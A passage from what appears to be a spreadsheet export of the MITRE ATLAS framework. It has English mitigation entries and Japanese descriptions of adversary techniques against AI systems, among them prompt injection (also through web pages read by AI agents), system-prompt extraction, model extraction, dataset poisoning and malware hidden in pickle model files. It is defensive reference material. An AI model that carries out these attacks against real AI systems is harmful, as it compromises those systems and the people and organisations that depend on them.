    <t xml:space="preserve">Limit the total number and rate of queries a user can perform.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0004</t>
  </si>
  <si>
    <t>AML.M0007</t>
  </si>
  <si>
    <t>course-of-action--de16f78e-92bc-427d-92da-6f71bf0a4418</t>
  </si>
  <si>
    <t>Sanitize Training Data</t>
  </si>
  <si>
    <t xml:space="preserve">Detect and remove or remediate poisoned training data.  Training data should be sanitized prior to model training and recurrently for an active learning model.
Implement a filter to limit ingested training data.  Establish a content policy that would remove unwanted content such as certain explicit or offensive language from being used.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0007</t>
  </si>
  <si>
    <t>AML.M0006</t>
  </si>
  <si>
    <t>course-of-action--cf12cfaa-408e-4bd0-85fb-9e068dc8699a</t>
  </si>
  <si>
    <t>Use Ensemble Methods</t>
  </si>
  <si>
    <t xml:space="preserve">Use an ensemble of models for inference to increase robustness to adversarial inputs. Some attacks may effectively evade one model or model family but be ineffective against others.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0006</t>
  </si>
  <si>
    <t>AML.M0009</t>
  </si>
  <si>
    <t>course-of-action--7de8e8c2-de8d-4000-b87f-385d36e1bf81</t>
  </si>
  <si>
    <t>Use Multi-Modal Sensors</t>
  </si>
  <si>
    <t xml:space="preserve">Incorporate multiple sensors to integrate varying perspectives and modalities to avoid a single point of failure susceptible to physical attacks.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0009</t>
  </si>
  <si>
    <t>AML.M0018</t>
  </si>
  <si>
    <t>course-of-action--4237c0ff-cea4-42bd-8419-9f05ea23798b</t>
  </si>
  <si>
    <t>User Training</t>
  </si>
  <si>
    <t>Educate AI model developers on secure coding practices and AI vulnerabilities.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0018</t>
  </si>
  <si>
    <t>AML.M0008</t>
  </si>
  <si>
    <t>course-of-action--50791788-7055-4498-9b8e-24737141921f</t>
  </si>
  <si>
    <t>Validate AI Model</t>
  </si>
  <si>
    <t>Validate that AI models perform as intended by testing for backdoor triggers or adversarial bias.
Monitor model for concept drift and training data drift, which may indicate data tampering and poisoning.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0008</t>
  </si>
  <si>
    <t>AML.M0014</t>
  </si>
  <si>
    <t>course-of-action--7ae9540a-f380-495a-8a5a-5413378defd5</t>
  </si>
  <si>
    <t>Verify AI Artifacts</t>
  </si>
  <si>
    <t>Verify the cryptographic checksum of all AI artifacts to verify that the file was not modified by an attacker.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0014</t>
  </si>
  <si>
    <t>AML.M0016</t>
  </si>
  <si>
    <t>course-of-action--ff8b3c2e-aeab-4d66-a7bf-86058bb77ed3</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.
File formats such as pickle files that are commonly used to store AI models can contain exploits that allow for arbitrary code execution.
These files should be scanned for potentially unsafe calls, which could be used to execute code, create new processes, or establish networking capabilities.
Adversaries may embed malicious code in model corrupt model files, so scanners should be capable of working with models that cannot be fully de-serialized.
Both model artifacts and downstream products produced by models should be scanned for known vulnerabilities.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0016</t>
  </si>
  <si>
    <t>名称</t>
  </si>
  <si>
    <t>説明</t>
  </si>
  <si>
    <t>URL</t>
  </si>
  <si>
    <t>作成日付</t>
  </si>
  <si>
    <t>最終更新日付</t>
  </si>
  <si>
    <t>戦術</t>
  </si>
  <si>
    <t>プラットフォーム</t>
  </si>
  <si>
    <t>AI アーティファクトの収集</t>
  </si>
  <si>
    <t>敵対者は、[持出し](/tactics/AML.TA0010) または [AI 攻撃のステージング](/tactics/AML.TA0001) で使用するために ML アーティファクトを収集する場合があります。AI アーティファクトには、モデルとデータセットのほか、モデルとのやり取り時に生成されるその他のテレメトリ データが含まれます。</t>
  </si>
  <si>
    <t>AI 開発のワークスペース</t>
  </si>
  <si>
    <t>AI 攻撃の開発とステージングには、多くの場合、高価なコンピューティング リソースが必要です。敵対者は、攻撃を開発するために 1 つ以上の GPU にアクセスする必要がある場合があります。敵対者は、作戦を実行するための一時的なリソースを効率的に立ち上げる方法として、Google Colaboratory などの無料リソースや、AWS、Azure、Google Cloud などのクラウド リソースを匿名で使用しようとする場合があります。検出を回避するために、複数のワーク スペースが使用される場合があります。</t>
  </si>
  <si>
    <t>AI 知的財産の窃取</t>
  </si>
  <si>
    <t>敵対者は AI アーティファクトを持出して知的財産を盗み、被害者組織に経済的損害を与える可能性があります。
プロプラエタリーな学習データは、収集とアノテーションにコストがかかり、[持出し](/tactics/AML.TA0010) や窃取の対象となる可能性があります。
AIaaS プロバイダーは API の使用料を請求します。[持出し](/tactics/AML.TA0010) または [AI モデルの抽出](/techniques/AML.T0024.002) を介してモデルを窃取した敵対者は、知的財産の所有者に料金を支払うことなく、そのサービスを無制限に使用できるようになります。</t>
  </si>
  <si>
    <t>AI モデルの推論 API へのアクセス</t>
  </si>
  <si>
    <t>敵対者は、推論 API への正当なアクセスを介してモデルにアクセスする可能性があります。推論 API へのアクセスは、敵対者にとっての情報源（[AI モデルのオントロジーの探索](/techniques/AML.T0013)、[AI モデル ファミリーの探索](/techniques/AML.T0014)）、攻撃を検証する手段（[攻撃の検証](/techniques/AML.T0042)、[敵対的データの作成](/techniques/AML.T0043)）、または影響を与えるために標的のシステムにデータを導入する手段（AI モデルの回避](/techniques/AML.T0015)、[AI モデルの整合性の侵害](/techniques/AML.T0031)）となる可能性があります。
多くのシステムは推論 API 経由で提供される同一のモデルに依存しており、これはつまり、共通の脆弱性を抱えていることを意味します。これは特に、学習に膨大なリソースを必要とする基盤モデルに当てはまります。敵対者は、モデルの API へのアクセスを利用して、脱獄や幻覚といった脆弱性を特定し、同じモデルを使用するアプリケーションを標的にする可能性があります。</t>
  </si>
  <si>
    <t>AI ソフトウェア</t>
  </si>
  <si>
    <t>ほとんどの AI システムは、限られた数の AI フレームワークに依存しています。敵対者は、サプライ チェーンの 1 つを構成することで、多数の AI システムにアクセスできます。多くの AI プロジェクトは、さまざまなアルゴリズムの他のオープン ソース実装にも依存しています。これらも、特定のシステムにアクセスするために標的を絞って侵害される可能性があります。</t>
  </si>
  <si>
    <t>AI サプライ チェーンの侵害</t>
  </si>
  <si>
    <t>敵対者は、AI サプライ チェーンの固有の部分を侵害することで、システムへの初期アクセスを獲得する可能性があります。これには、[GPU ハードウェア](/techniques/AML.T0010.000)、[データ](/techniques/AML.T0010.002) とそのアノテーション、AI [AI ソフトウェア](/techniques/AML.T0010.001) スタックの一部、または [モデル（注: 原文 "Model"）](/techniques/AML.T0010.003) 自体が含まれる可能性があります。
場合によっては、敵対者は、サプライ チェーンの侵害済みコンポーネントを使用して攻撃を完全に実行するために、二次アクセスが必要になります。</t>
  </si>
  <si>
    <t>AI 対応の製品やサービス</t>
  </si>
  <si>
    <t>敵対者は、AI を裏で使用している製品やサービスを使用して、基盤となる AI モデルにアクセスする可能性があります。この種類の間接的なモデル アクセスにより、AI モデルの詳細やログまたはメタデータ内の推論が明らかになる可能性があります。</t>
  </si>
  <si>
    <t>インフラストラクチャの獲得</t>
  </si>
  <si>
    <t>敵対者は、作戦全体で使用するインフラストラクチャを購入、リース、またはレンタルする可能性があります。敵対者の作戦をホストおよびオーケストレーションするためのインフラストラクチャは多種多様です。インフラストラクチャ ソリューションには、物理​​サーバーまたはクラウド サーバー、ドメイン、モバイル デバイス、サード パーティの Web サービスが含まれます。無料のリソースも使用できますが、通常は制限があります。インフラには、AIコンポーネントやセンサーの性能を低下させたり妨害したりする対抗手段（印刷物、ウェアラブルデバイス、偽装装置など）といった物理的なコンポーネントも含まれます。
これらのインフラストラクチャ ソリューションを使用すると、敵対者は作戦を準備、開始、実行できます。ソリューションは、サード パーティの Web サービスへの接続など、通常と見なされるトラフィックに敵対者の作戦を溶け込ませるのに役立つ場合があります。実装によっては、敵対者は物理的に自身に結び付けるのが難しいインフラストラクチャを使用するだけでなく、迅速にプロビジョニング、変更、シャットダウンできるインフラストラクチャを利用することもあります。</t>
  </si>
  <si>
    <t>公開されている AI アーティファクトの獲得</t>
  </si>
  <si>
    <t>敵対者は、クラウド ストレージ、一般向けサービス、ソフトウェアまたはデータ リポジトリなどの公開ソースを検索して、AI アーティファクトを特定する可能性があります。これらの AI アーティファクトには、モデルの学習とデプロイに使用されるソフトウェア スタック、学習データとテスト データ、モデル構成とパラメーターが含まれる場合があります。敵対者は、被害者組織によってホストされているアーティファクトや被害者組織に関連付けられているアーティファクトに特に関心を持ちます。これらのアーティファクトは、その組織が実稼働環境で使用しているものを表す可能性があるためです。敵対者は、被害者組織に関連付けられている他のリソース ([被害者所有の Web サイトの検索](/techniques/AML.T0003) や [公開されている技術データベースの検索](/techniques/AML.T0000) など) を介してアーティファクト リポジトリを特定する場合があります。これらの AI アーティファクトは、多くの場合、AI のタスクとアプローチの詳細を攻撃者に提供します。
AI アーティファクトは、攻撃者が [プロキシ AI モデルの作成](/techniques/AML.T0005) を行うのに役立ちます。これらのアーティファクトに実際の本番環境のモデルの一部が含まれている場合、それらを使用して直接 [敵対的データの作成](/techniques/AML.T0043) を行うことができます。一部のアーティファクトを取得するには、（メール アドレスや名前などのユーザーの詳細を提示するような）登録、AWS キー、または書面によるリクエストが必要であり、敵対者は [アカウントの確立](/techniques/AML.T0021) を行う必要がある場合もあります。
アーティファクトは、被害者が管理するインフラストラクチャでホストされ、被害者にそのデータにアクセスした人物に関する情報を提供することもあります。</t>
  </si>
  <si>
    <t>能動的なスキャン</t>
  </si>
  <si>
    <t>敵対者は、標的とするための情報を収集するために、被害者のシステムを調査またはスキャンすることがあります。これは、被害者のシステムと直接やり取りしない他の偵察手法とは異なります。</t>
  </si>
  <si>
    <t>AI への敵対的攻撃の実装</t>
  </si>
  <si>
    <t>敵対者は、AI への攻撃用の既存のオープンソース実装を探す可能があります。研究コミュニティは、再現性と将来の研究を促進するために、コードを公開することがよくあります。CleverHans、Adversarial Robustness Toolbox、FoolBox などの研究目的のライブラリは、敵対者によって武器化される可能性があります。敵対者は、攻撃の一環として、元々は AI への敵対的攻撃用に設計されていないツールを入手して使用する場合もあります。</t>
  </si>
  <si>
    <t>AI への敵対的攻撃</t>
  </si>
  <si>
    <t>敵対者は、独自の敵対的攻撃を開発する可能性があります。敵対者は、既存のライブラリを出発点として活用する可能性があります（[AI への敵対的攻撃の実装](/techniques/AML.T0016.000)）。敵対者は、公開されている研究論文に掲載されているアイデアを実装したり、被害者のモデル用にカスタム メイドした攻撃を開発したりする可能性があります。</t>
  </si>
  <si>
    <t>ブラック ボックス最適化</t>
  </si>
  <si>
    <t>ブラック ボックス攻撃では、敵対者は標的のモデルへのブラック ボックス アクセス（つまり、API アクセス経由の [AI モデルの推論 API アクセス](/techniques/AML.T0040)）を行います。ブラック ボックス攻撃では、敵対者は被害者が監視している API を使用している可能性があります。これらの攻撃は、一般に [ホワイト ボックス最適化](/techniques/AML.T0043.000) 攻撃よりも効果が低く、より多くの推論が必要ですが、必要なアクセスははるかに少なくなります。</t>
  </si>
  <si>
    <t>ブラック ボックス転送</t>
  </si>
  <si>
    <t>ブラック ボックス転送攻撃では、敵対者は、完全なアクセス権を持ち、標的のモデルを代表する 1 つ以上のプロキシー モデル（[プロキシー AI モデルの作成](/techniques/AML.T0005) または [レプリケーションによるプロキシーの学習](/techniques/AML.T0005.001) によって学習済みであるモデル) を使用します。敵対者は、プロキシー モデルに対して [ホワイトボックス最適化](/techniques/AML.T0043.000) を使用して、敵対的サンプルを生成します。プロキシー モデルのセットが標的のモデルに十分近い場合、敵対的サンプルは 1 つのモデルから別のモデルに一般化される可能性が高くなります。つまり、プロキシー モデルに有効な攻撃は、標的のモデルにも有効である可能性が高いということです。敵対者が [AI モデルの推論 API へのアクセス](/techniques/AML.T0040) を行うことができる場合、[攻撃の検証](/techniques/AML.T0042) を使用して攻撃が機能していることを確認し、その情報を学習プロセスに組み込むことができます。</t>
  </si>
  <si>
    <t>引用</t>
  </si>
  <si>
    <t>敵対者は、AI システムの応答で提供される引用を操作し、その信頼性を偽装する可能性があります。その例としては、間違った引用を引用したり、新たな引用を捏造したり、あるいは正しい引用であっても攻撃者が提供したデータに対しては正しい引用を引用したりするといったことが挙げられます。</t>
  </si>
  <si>
    <t>クラウド サービスの探索</t>
  </si>
  <si>
    <t>敵対者は、アクセスを取得した後、システム上で実行されているクラウド サービスを列挙しようとする可能性があります。これらの方法は、PaaS（Platform-as-a-Service）、IaaS（Infrastructure-as-a-Service）、SaaS（Software-as-a-Service）など、多岐にわたります。様々なクラウド プロバイダーには多くのサービスが存在し、継続的インテグレーションと継続的デリバリー（CI/CD）、Lambda Functions、Entra ID などが含まれます。また、AWS GuardDuty や Microsoft Defender for Cloud などのセキュリティ サービス、AWS CloudTrail や Google Cloud Audit Logs などのログ サービスも含まれる場合があります。
敵対者は、環境全体で有効化されているサービスに関する情報の発見を試みる場合があります。Microsoft Graph API や Azure Resource Manager API などの Azure ツールと API は、アプリケーション、管理グループ、リソースとポリシー定義、そして ID でアクセスできるそれらの関係など、リソースとサービスを列挙できます。[1][2]
例えば、Stormspotter は Azure のリソースとサービスを列挙してグラフを作成するオープンソース ツールであり、Pacu はクラウドサービスを発見するための複数の手法をサポートする AWS エクスプロイトに関するオープンソース フレームワークです。[3][4]
敵対者は、取得した情報を利用して、列挙されたサービスからデータや認証情報を標的にしたり、ツールの無効化または変更、あるいはクラウド ログの無効化または変更によって特定された防御を回避したりするなど、後続の行動を形成する可能性があります。</t>
  </si>
  <si>
    <t>コマンドおよびスクリプト インタープリター</t>
  </si>
  <si>
    <t>敵対者は、コマンドおよびスクリプト インタープリターを悪用して、コマンド、スクリプト、またはバイナリーを実行する可能性があります。これらのインターフェースと言語は、コンピューター システムと対話する方法を提供し、さまざまなプラットフォームで共通の機能です。ほとんどのシステムには、組み込みのコマンドライン インターフェースとスクリプト機能が付属しています。たとえば、macOS および Linux ディストリビューションには多種の Unix Shell が含まれ、Windows インストールには Windows Command Shell と PowerShell が含まれます。
また、Python などのクロスプラットフォーム インタープリターや、JavaScript や Visual Basic などのクライアント アプリケーションに通常関連しているインタープリターもあります。
敵対者は、任意のコマンドを実行する手段として、さまざまな方法でこれらのテクノロジーを悪用する可能性があります。コマンドとスクリプトは、おとり文書として被害者に配信される初期アクセス ペイロードに埋め込まれるか、既存の C2 からダウンロードされるセカンダリー ペイロードとして埋め込まれます。敵対者は、対話型ターミナル/シェルを介してコマンドを実行したり、さまざまなリモート サービスを利用してリモート実行を実現したりすることもできます。</t>
  </si>
  <si>
    <t>消費者向けハードウェア</t>
  </si>
  <si>
    <t>敵対者は、攻撃を実行するために消費者向けハードウェアを入手する場合があります。ハードウェアを所有することで、敵対者は環境を完全に制御できます。これらのデバイスは追跡が困難です。</t>
  </si>
  <si>
    <t>コンテナ レジストリ</t>
  </si>
  <si>
    <t>敵対者は、改ざんされたコンテナ イメージをプッシュし、既存のコンテナ名やタグを上書きすることで、被害者のコンテナ レジストリを侵害する可能性があります。コンテナ レジストリのユーザーや自動化された CI/CD パイプラインは、攻撃者のコンテナ イメージをプルし、AI サプライ チェーンを侵害する可能性があります。これは、開発環境やデプロイメント環境に影響を及ぼす可能性があります。
コンテナ イメージには AI モデルが含まれている場合があり、侵害されたイメージには、攻撃者によって操作された AI モデルが含まれている可能性があります（[AI モデルの操作](/techniques/AML.T0018) を参照）。</t>
  </si>
  <si>
    <t>AI モデルの破損</t>
  </si>
  <si>
    <t>敵対者は、モデル スキャナによる検出を回避するために、悪意のある AI モデル ファイルを意図的に破損させ、デシリアライズを不可能にする可能性があります。破損したモデルは、デシリアライズが失敗する前に悪意のあるコードを実行する可能性があります。</t>
  </si>
  <si>
    <t>コスト ハーベスティング</t>
  </si>
  <si>
    <t>敵対者は、さまざまな機械学習サービスを標的にして、無駄なクエリーや計算コストの高い入力を送信し、被害者の組織でのサービス実行コストを増やす可能性があります。Sponge Example とは、エネルギー消費を最大化し、運用コストを最大化するように設計された特定の種類の敵対的データのことを指します。</t>
  </si>
  <si>
    <t>敵対的データの作成</t>
  </si>
  <si>
    <t>敵対的データとは、機械学習モデルへの入力で、敵対者が標的のモデルに望む効果をもたらすように変更されたものです。効果は、誤分類、検出漏れ、エネルギー消費の最大化など多岐にわたります。通常、変更は規模や場所が制限されるため、人間はデータが変更されていないかのように認識しますが、敵対者の意図する効果によっては、人間の認識が常に問題になるわけではありません。例えば、画像分類タスクの敵対的入力は、AI モデルでは誤分類されますが、人間は正しいクラスが含まれていると認識します。
敵対者は、標的のモデルに関する知識とアクセスに応じて、異なるクラスのアルゴリズムを使用して敵対的サンプルを開発する可能性があります。たとえば、[ホワイト ボックス最適化](/techniques/AML.T0043.000)、[ブラック ボックス最適化](/techniques/AML.T0043.001)、[ブラック ボックス転送](/techniques/AML.T0043.002)、[手動による変更](/techniques/AML.T0043.003) などです。
敵対者は、モデルへのホワイト ボックスまたは推論 API アクセスがある場合、そのアプローチが機能するかどうかを [攻撃の検証](/techniques/AML.T0042) を行うことができます。これにより、敵対者は、攻撃が気付かれる可能性のある「ライブ」環境で攻撃が効果的であることをと確信できます。その後、敵対者は後でその攻撃を使用して目標を達成できます。敵対者は、[AI モデルの回避](/techniques/AML.T0015) をしたり、[AI モデルの整合性の侵害](/techniques/AML.T0031) をしたりするために敵対的サンプルを最適化する可能性があります。</t>
  </si>
  <si>
    <t>プロキシー AI モデルの作成</t>
  </si>
  <si>
    <t>敵対者は、被害者の組織で使用されている標的のモデルのプロキシーとして機能するモデルを入手する可能性があります。プロキシー モデルは、完全にオフラインの状態で標的のモデルへの完全なアクセスをシミュレートするために使用されます。
敵対者は、代表的なデータセットからモデルを学習させたり、被害者の推論 API からモデルをレプリケーションしようとしたり、利用可能な事前学習済みモデルを使用したりする可能性があります。</t>
  </si>
  <si>
    <t>データ</t>
  </si>
  <si>
    <t>データは、敵対者にとってサプライ チェーン侵害の重要なベクトルです。すべての AI プロジェクトには、何らかの形式のデータが必要です。多くの AIプロジェクトは、公開されている大規模なオープン ソース データセットに依存しています。敵対者は、これらのデータ ソースを侵害する可能性があります。悪意のあるデータは、[学習データの汚染](/techniques/AML.T0020) の結果であることもあれば、従来のマルウェアを含んでいることもあります。
敵対者は、ラベル付けフェーズでプライベート データセットを標的にすることもできます。プライベート データセットを作成するには、多くの場合、外部のラベル付けサービスを利用する必要があります。敵対者は、ラベル付けサービスによって生成されるラベルを変更することで、データセットを改ざんできます。</t>
  </si>
  <si>
    <t>情報リポジトリのデータ</t>
  </si>
  <si>
    <t>敵対者は、情報リポジトリを利用して貴重な情報をマイニングする可能性があります。
情報リポジトリーは、通常、ユーザー間のコラボレーションや情報共有を容易にするために情報を保存できるツールであり、敵対者のさらなる目的に役立つ可能性のあるさまざまなデータや、標的の情報への直接アクセスを保存できます。
リポジトリーに保存される情報は、特定のインスタンスまたは環境によって異なる場合があります。
一般的な情報リポジトリーには、SharePoint、Confluence、SQL Server などのエンタープライズ データベースなどがあります。</t>
  </si>
  <si>
    <t>ローカル システムのデータ</t>
  </si>
  <si>
    <t>敵対者は、ファイル システムや構成ファイル、ローカル データベースなどのローカル システム ソースを検索して、持出し前に関心のあるファイルや機密データを探すことがあります。
これには、基本的なフィンガープリント情報や SSH キーなどの機密データが含まれる場合があります。</t>
  </si>
  <si>
    <t>データセット</t>
  </si>
  <si>
    <t>敵対者は、公開データセットを収集して、それを作戦に利用することがあります。被害者組織が使用するデータセット、または被害者組織が使用するデータを代表するデータセットは、敵対者にとって貴重なものとなる可能性があります。データセットは、クラウド ストレージまたは被害者所有の Web サイトに保存できます。一部のデータセットでは、敵対者がアクセスするために [アカウントの確立](/techniques/AML.T0021) を行う必要があります。
取得したデータセットは、攻撃者が作戦を進め、攻撃を仕掛け、被害者組織に合わせた攻撃を行うのに役立ちます。</t>
  </si>
  <si>
    <t>AI サービスへの運用妨害</t>
  </si>
  <si>
    <t>敵対者は、サービスを低下させたり停止させたりする目的で、大量のリクエストで AI システムを標的にすることがあります。多くの AI システムは大量の特殊なコンピューティングを必要とするため、多くの場合、過負荷になる可能性のある費用の掛かるボトルネックとなります。敵対者は、AI システムから大量の無駄なコンピューティングを必要とする入力を意図的に作成できます。</t>
  </si>
  <si>
    <t>機能の開発</t>
  </si>
  <si>
    <t>敵対者は、攻撃を支援するために独自の機能を開発する場合があります。このプロセスには、要件の特定、ソリューションの構築、機能のデプロイが含まれます。AI システムへの攻撃を支援するために使用される機能は、必ずしも AI ベースである必要はありません。例としては、敵対的な情報を含む Web サイトの設定や、難読化された持出し用のコードを含む Jupyter ノートブックの作成などが挙げられます。</t>
  </si>
  <si>
    <t>直接（インジェクション）</t>
  </si>
  <si>
    <t>敵対者は、LLM のユーザーとして直接プロンプトを注入する可能性があります。この種類の注入は、敵対者がシステムへの足掛かりを得たり、LLM 自体を悪用して有害なコンテンツを生成するなどの目的で使用したりする可能性があります。</t>
  </si>
  <si>
    <t>AI アーティファクトの探索</t>
  </si>
  <si>
    <t>敵対者は、プライベート ソースを検索して、システム上に存在する AI アーティファクトを特定し、それらに関する情報を収集する可能性があります。これらのアーティファクトには、モデルの学習とデプロイに使用されるソフトウェア スタック、学習データとテスト データの管理システム、コンテナー レジストリー、ソフトウェア リポジトリー、モデル ズーなどが含まれます。
この情報は、更なる収集、持出し、または中断目的で標的を特定して攻撃を調整し改善するために使用できます。</t>
  </si>
  <si>
    <t>AI モデル ファミリーの探索</t>
  </si>
  <si>
    <t>敵対者は、モデルの一般的なファミリーを探索する可能性があります。モデルに関する一般的な情報はド文書で明らかにされるか、敵対者は慎重に構築された例を使用してモデルの応答を分析し、モデルを分類する可能性があります。
モデル ファミリーの知識は、敵対者がモデルを攻撃する手段を特定し、攻撃をカスタマイズするのに役立ちます。</t>
  </si>
  <si>
    <t>AI モデルのオントロジーの探索</t>
  </si>
  <si>
    <t>敵対者は、AI モデルの出力空間のオントロジー、例えばモデルが検出できるオブジェクトの種類を探索する可能性があります。敵対者は、モデルに繰り返しクエリを実行してオントロジーを発見し、モデルに出力空間を列挙させる可能性があります。または、オントロジーは、構成ファイルまたはモデルに関する文書で発見される可能性があります。
モデルのオントロジーは、モデルが被害者によってどのように使用されているかを敵対者が理解するのに役立ちます。モデルのオントロジーは、敵対者が標的型攻撃を作成する際に役立ちます。</t>
  </si>
  <si>
    <t>AI モデルの出力の探索</t>
  </si>
  <si>
    <t>敵対者は、クラス スコアなどのシステムの動作に必須ではなく、エンドユーザーによる使用も想定されていないモデル出力を探索する可能性があります。モデル出力はログに含まれていたり、API の応答に含まれている場合があります。敵対者は、モデル出力を利用して、モデルの弱点を特定し、攻撃を展開する可能性があります。</t>
  </si>
  <si>
    <t>LLM の幻覚の探索</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデルを操作し、幻覚化された実体を特定する可能性があります。敵対者は、ソフトウェア パッケージ、コマンド、URL、組織名、メール アドレスなどを要求し、現実世界と関連づけられていない幻覚を特定する可能性があります。発見された幻覚は、攻撃者に[幻覚化された実体の公開](/techniques/AML.T0060) の潜在的な標的を提供します。異なる言語モデルでも同じ幻覚が生成されることが示されているため、敵対者が悪用した幻覚は、他の言語モデルを使用しているユーザーにも影響を及ぼす可能性があります。</t>
  </si>
  <si>
    <t>LLM のシステム情報の探索</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）のシステム情報に関する情報を盗み取ろうとします。この情報は、システム命令を含む設定ファイル内、または LLM とのやり取りを通じて抽出される可能性があります。対象となる情報には、システム プロンプト全体、LLM にとって重要な特殊文字、LLM で利用可能な機能を示すキーワードなどが含まれます。LLM への命令の送信方法に関する情報は、攻撃者がシステムの機能を理解し、悪意のあるプロンプトを作成するために利用される可能性があります。</t>
  </si>
  <si>
    <t>ドメイン</t>
  </si>
  <si>
    <t>敵対者は、標的を絞るために利用可能なドメインを取得する可能性があります。ドメイン名とは、1 つ以上の IP アドレスを表すために使用される、人間が判読できる名前です。ドメイン名は購入することも、場合によっては無料で取得することもできます。
敵対者は、取得したドメインを様々な目的で使用する可能性があります（[ATT&amp;CK](https://attack.mitre.org/techniques/T1583/001/) を参照）。大規模な AI データセットは、多くの場合、個々のデータポイントへの URL リストとして配布されます。攻撃者は、これらのデータセットに含まれる期限切れのドメインを取得し、個々のデータポイントを改ざんされたサンプルに置き換える可能性があります（[汚染済みデータセットの公開](/techniques/AML.T0019)）。</t>
  </si>
  <si>
    <t>ドライブ バイによる侵害</t>
  </si>
  <si>
    <t>敵対者は、通常のブラウジングの過程でウェブサイトを訪れるユーザーや、ユーザーに代わってウェブから情報を取得する AI エージェントを通じて、AI システムにアクセスする可能性があります。ウェブサイトには [LLM プロンプト インジェクション](/techniques/AML.T0051) が含まれている可能性があり、これが実行されると AI モデルの挙動が変更される可能性があります。
同じ手法は、AI を直接標的としない他の種類の悪意のあるコードを配信するためにも使用される可能性があります（[ATT&amp;CKにおけるドライブ バイによる侵害](https://attack.mitre.org/techniques/T1189/) を参照）。</t>
  </si>
  <si>
    <t>マルウェアの埋め込み</t>
  </si>
  <si>
    <t>敵対者は、AI モデル ファイルに悪意のあるコードを埋め込む可能性があります。AI モデルは、命令と重みの組み合わせとしてパッケージ化されている場合があります。pickle ファイルなどの一部の形式は、exec などの安全でない呼び出しが含まれている可能性があるため、デシリアライズが安全ではありません。
マルウェアが埋め込まれたモデルでも、期待どおりに動作する可能性があります。これにより、実行、コマンド＆コントロール、またはデータの持出しが可能になる可能性があります。</t>
  </si>
  <si>
    <t>AI モデルの整合性の侵害</t>
  </si>
  <si>
    <t>敵対者は、敵対的なデータ入力によって標的のモデルのパフォーマンスを低下させ、時間の経過とともにシステムへの信頼性を低下させる可能性があります。これにより、被害を受けた組織は、システムの修正を試みたり、自動化されることになっていたタスクを手動で実行したりすることで、時間と費用を無駄にする可能性があります。</t>
  </si>
  <si>
    <t>データセットの整合性の侵害</t>
  </si>
  <si>
    <t>敵対者は、データセットの一部を改ざんまたは操作して、その有用性を低下させ、信頼を低下させ、ユーザーがエラーを修正するためにリソースを無駄にするように仕向ける可能性があります。</t>
  </si>
  <si>
    <t>アカウントの確立</t>
  </si>
  <si>
    <t>敵対者は、[AI 攻撃のステージング](/tactics/AML.TA0001)に必要なリソースにアクセスするために、標的の絞り込み用または被害者へのなりすまし用のアカウントをさまざまなサービスで作成する可能性があります。</t>
  </si>
  <si>
    <t>AI モデルの回避</t>
  </si>
  <si>
    <t>敵対者は、AI モデルがデータの内容を正しく識別するのを妨げる [敵対的データの作成](/techniques/AML.T0043) を行うことができます。この手法は、AI が利用される下流のタスクを回避するために使用できます。敵対者は、従来のサイバー攻撃の目標に向けた AI ベースのウイルス/マルウェア検出やネットワーク スキャンを回避する可能性があります。</t>
  </si>
  <si>
    <t>AI の推論 API による流出</t>
  </si>
  <si>
    <t>敵対者は、[AI モデル推論 API へのアクセス](/techniques/AML.T0040) を介して個人情報を持出す可能性があります。AI モデルは、学習データに関する秘匿情報を漏洩することが示されています（例: [学習データのメンバーシップの推論](/techniques/AML.T0024.000)、[AI モデルの反転](/techniques/AML.T0024.001)）。モデル自体も、[AI 知的財産の窃盗](/techniques/AML.T0048.004) の目的で抽出される可能性があります（[AI モデルの抽出](/techniques/AML.T0024.002)）。
秘匿学習データに関する情報の盗み出しは、プライバシーに関する懸念を引き起こします。秘匿学習データには、個人を特定できる情報やその他の保護されたデータが含まれる場合があります。</t>
  </si>
  <si>
    <t>サイバー手段による流出</t>
  </si>
  <si>
    <t>敵対者は、従来のサイバー手段を使用して、AI アーティファクトや、目的に関連するその他の情報を持出す可能性があります。
詳細については、ATT&amp;CK の戦術 [持出し](https://attack.mitre.org/tactics/TA0010/) を参照してください。</t>
  </si>
  <si>
    <t>公開アプリケーションの悪用</t>
  </si>
  <si>
    <t>敵対者は、ソフトウェア、データ、またはコマンドを使用して、インターネットに接続されたコンピュータまたはプログラムの弱点を悪用し、意図しない、または予期しない動作を起こそうとすることがあります。システムの弱点は、バグ、不具合、または設計上の脆弱性である可能性があります。これらのアプリケーションは、多くの場合 Web サイトですが、データベース (SQL など)、標準サービス (SMB や SSH など)、ネットワーク デバイス管理および管理プロトコル (SNMP や Smart Install など)、および Web サーバーや関連サービスなど、インターネットにアクセス可能なオープン ソケットを持つその他のアプリケーションも含まれる場合があります。</t>
  </si>
  <si>
    <t>外部への危害</t>
  </si>
  <si>
    <t>敵対者は、被害者のシステムへのアクセスを悪用し、そのシステムのリソースや機能を利用して、システムの外部に危害を与えることで、目的を達成する可能性があります。これらの危害は、組織（金銭的損害、風評被害など）、そのユーザー（ユーザー被害など）、または一般大衆（社会的損害など）に影響を及ぼす可能性があります。</t>
  </si>
  <si>
    <t>AI モデルの抽出</t>
  </si>
  <si>
    <t>敵対者は、プライベート モデルの機能コピーを抽出する可能性があります。敵対者は、被害者の [AI モデルの推論 API へのアクセス](/techniques/AML.T0040) を繰り返しクエリーを行うことで、標的のモデルの推論をデータセットに収集できます。推論は、標的のモデルの動作とパフォーマンスを模倣する別のモデルをオフラインで学習するためのラベルとして使用されます。
敵対者は、モデルを抽出して、サービスとしての AI (AIaaS) におけるクエリーごとの料金を支払わないようにする可能性があります。モデルの抽出は、[AI 知的財産の窃取](/techniques/AML.T0048.004) に使用されます。</t>
  </si>
  <si>
    <t>LLM システム プロンプトの抽出</t>
  </si>
  <si>
